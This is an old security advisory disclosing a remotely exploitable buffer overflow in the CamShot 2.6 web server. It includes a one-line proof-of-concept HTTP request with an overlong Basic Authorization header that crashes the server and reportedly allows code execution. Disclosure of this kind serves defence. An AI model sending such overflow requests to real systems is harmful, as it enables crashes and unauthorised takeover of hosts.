[ SOURCE: http://www.secureroot.com/security/advisories/9693912448.html ]

Vulnerability in CamShot server (Authorization)

----------------------------------------------------------------------------







SUMMARY



CamShot is a web server that serves up web pages containing time stamped

images captured from a video camera. This product contains a remotely

exploitable security vulnerability that allows a remote attacker to gain

elevated privileges on the remote system.



DETAILS



Vulnerable Versions:

CamShot 2.6 trial version ( <http://broadgun.com/camsht26.exe> )



Example:



GET / HTTP/1.1<enter>

Authorization: Basic ['a'x325]<enter><enter>



Since the server crashes in a way that enables attackers to execute

arbitrary code, this vulnerability is quite dangerous.



Vendor:

Vendor has been contacted Saturday, August 26, 2000. No response has been

received.





ADDITIONAL INFORMATION



The security hole was discovered by  <mailto:expert@securiteam.com> Beyond

Security's SecuriTeam.





====================

DISCLAIMER:

The information in this bulletin is provided "AS IS" without warranty of any

kind.

In no event shall we be liable for any damages whatsoever including direct,

indirect, incidental, consequential, loss of business profits or special

damages.

====================